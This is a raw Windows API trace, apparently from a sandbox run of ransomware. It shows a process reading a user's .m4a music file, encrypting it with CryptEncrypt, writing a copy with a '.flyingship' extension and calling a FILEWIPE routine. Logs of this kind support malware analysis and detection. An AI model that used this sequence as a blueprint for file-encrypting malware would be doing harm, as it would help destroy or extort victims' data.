hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0181.045] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0181.045] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0181.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0181.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0181.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0181.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0181.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0181.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0181.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0181.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0181.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae58 [0181.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbca008 [0181.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0181.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0181.047] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\4b9s3wh6aiujay85.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0181.047] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0181.047] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0181.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0181.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0181.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0181.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0181.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0181.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0181.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0181.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0181.047] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0181.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0181.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0181.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0181.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0181.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0181.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0181.048] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0181.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0181.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0181.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0181.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0181.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0181.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0181.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0181.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0181.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0181.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0181.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0181.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0181.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0181.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0181.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0181.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0181.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0181.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0181.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0181.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0181.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0181.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0181.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0181.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0181.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0181.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0181.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0181.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0181.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6d90 [0181.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0181.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0181.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0181.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0181.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6d90 | out: hHeap=0x8a0000) returned 1 [0181.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0181.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0181.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0181.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0181.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0181.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0181.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0181.052] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.flyingship.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\4b9s3wh6aiujay85.flyingship.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0181.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0181.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0181.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0181.053] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0181.053] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0181.058] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x1a65, lpOverlapped=0x0) returned 1 [0181.058] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0181.060] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0181.062] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0181.062] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0181.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0181.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0181.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0181.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0181.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0181.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0181.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0181.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0181.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0181.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0181.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0181.063] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.063] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0181.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0181.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0181.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0181.063] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c2758, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2758*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0181.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0181.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0181.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0181.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0181.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0181.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0181.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0181.108] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0181.108] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0181.108] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0181.108] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.108] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0181.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0181.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0181.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0181.109] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x11a65, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x11a70) returned 1 [0181.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0181.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0181.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0181.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0181.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0181.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0181.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0181.110] CharLowerBuffW (in: lpsz="byte[72305]", cchLength=0xb | out: lpsz="byte[72305]") returned 0xb [0181.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0181.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0181.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0181.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0181.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0181.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0181.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0181.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0181.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0181.111] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.111] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0181.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0181.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0181.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0181.111] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa70a78*, pdwDataLen=0x87e820*=0x11a65, dwBufLen=0x11a70 | out: pbData=0xa70a78*, pdwDataLen=0x87e820*=0x11a70) returned 1 [0181.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0181.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0181.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0181.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0181.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0181.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0181.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0181.112] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0181.113] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0181.113] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0181.124] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0181.124] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.124] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0181.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0181.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0181.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0181.125] CryptDestroyKey (hKey=0x90af18) returned 1 [0181.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0181.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0181.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0181.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0181.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0181.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0181.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0181.125] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0181.125] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0181.125] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0181.125] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0181.125] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0181.125] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0181.126] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.126] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0181.126] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0181.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0181.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0181.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0181.126] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0181.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0181.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0181.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd600 [0181.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0181.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0181.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0181.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0181.126] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.126] FreeLibrary (hLibModule=0x74f20000) returned 1 [0181.128] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0181.129] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29386dc0, ftCreationTime.dwHighDateTime=0x1d5d951, ftLastAccessTime.dwLowDateTime=0x94d68360, ftLastAccessTime.dwHighDateTime=0x1d5dc48, ftLastWriteTime.dwLowDateTime=0x94d68360, ftLastWriteTime.dwHighDateTime=0x1d5dc48, nFileSizeHigh=0x0, nFileSizeLow=0x11a65, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="4b9s3WH6aiuJAy85.m4a", cAlternateFileName="4B9S3W~1.M4A")) returned 0x90af58 [0181.129] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0181.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0181.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0181.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0181.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0181.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0181.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0181.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0181.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0181.129] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0181.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0181.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0181.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0181.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0181.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0181.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0181.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0181.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0181.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0181.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0181.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0181.130] 